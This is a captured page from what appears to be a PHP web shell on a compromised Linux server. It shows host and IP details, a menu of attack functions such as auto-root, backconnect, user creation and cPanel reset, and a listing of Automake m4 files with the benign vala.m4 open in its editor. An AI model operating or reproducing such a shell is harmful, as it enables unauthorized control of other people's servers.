Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.221.90.184
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
aclocal-1.13 /
[ HOME SHELL ]
Name
Size
Permission
Action
internal
[ DIR ]
drwxr-xr-x
amversion.m4
1.58
KB
-rw-r--r--
ar-lib.m4
1.98
KB
-rw-r--r--
as.m4
767
B
-rw-r--r--
auxdir.m4
2.37
KB
-rw-r--r--
cond-if.m4
1.01
KB
-rw-r--r--
cond.m4
1.01
KB
-rw-r--r--
depend.m4
7.11
KB
-rw-r--r--
depout.m4
2.93
KB
-rw-r--r--
dmalloc.m4
906
B
-rw-r--r--
extra-recurs.m4
738
B
-rw-r--r--
gcj.m4
649
B
-rw-r--r--
init.m4
5.78
KB
-rw-r--r--
install-sh.m4
677
B
-rw-r--r--
lead-dot.m4
641
B
-rw-r--r--
lex.m4
689
B
-rw-r--r--
lispdir.m4
2.1
KB
-rw-r--r--
maintainer.m4
1.62
KB
-rw-r--r--
make.m4
1.3
KB
-rw-r--r--
minuso.m4
1.25
KB
-rw-r--r--
missing.m4
1.13
KB
-rw-r--r--
mkdirp.m4
1.32
KB
-rw-r--r--
obsolete.m4
1008
B
-rw-r--r--
options.m4
1.06
KB
-rw-r--r--
python.m4
8.87
KB
-rw-r--r--
runlog.m4
718
B
-rw-r--r--
sanity.m4
2.58
KB
-rw-r--r--
silent.m4
1.87
KB
-rw-r--r--
strip.m4
1.36
KB
-rw-r--r--
substnot.m4
675
B
-rw-r--r--
tar.m4
4.37
KB
-rw-r--r--
upc.m4
836
B
-rw-r--r--
vala.m4
1.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vala.m4
# Autoconf support for the Vala compiler # Copyright (C) 2008-2013 Free Software Foundation, Inc. # # This file is free software; the Free Software Foundation # gives unlimited permission to copy and/or distribute it, # with or without modifications, as long as this notice is preserved. # Check whether the Vala compiler exists in $PATH. If it is found, the # variable VALAC is set pointing to its absolute path. Otherwise, it is # simply set to 'valac'. # Optionally a minimum release number of the compiler can be requested. # If the ACTION-IF-FOUND parameter is given, it will be run if a proper # Vala compiler is found. # Similarly, if the ACTION-IF-FOUND is given, it will be run if no proper # Vala compiler is found. It defaults to simply print a warning about the # situation, but otherwise proceeding with the configuration. # # AM_PROG_VALAC([MINIMUM-VERSION], [ACTION-IF-FOUND], [ACTION-IF-NOT-FOUND]) # -------------------------------------------------------------------------- AC_DEFUN([AM_PROG_VALAC], [AC_PATH_PROG([VALAC], [valac], [valac]) AS_IF([test "$VALAC" != valac && test -n "$1"], [AC_MSG_CHECKING([whether $VALAC is at least version $1]) am__vala_version=`$VALAC --version | sed 's/Vala *//'` AS_VERSION_COMPARE([$1], ["$am__vala_version"], [AC_MSG_RESULT([yes])], [AC_MSG_RESULT([yes])], [AC_MSG_RESULT([no]) VALAC=valac])]) if test "$VALAC" = valac; then m4_default([$3], [AC_MSG_WARN([no proper vala compiler found]) AC_MSG_WARN([you will not be able to compile vala source files])]) else m4_default([$2], [:]) fi])
Close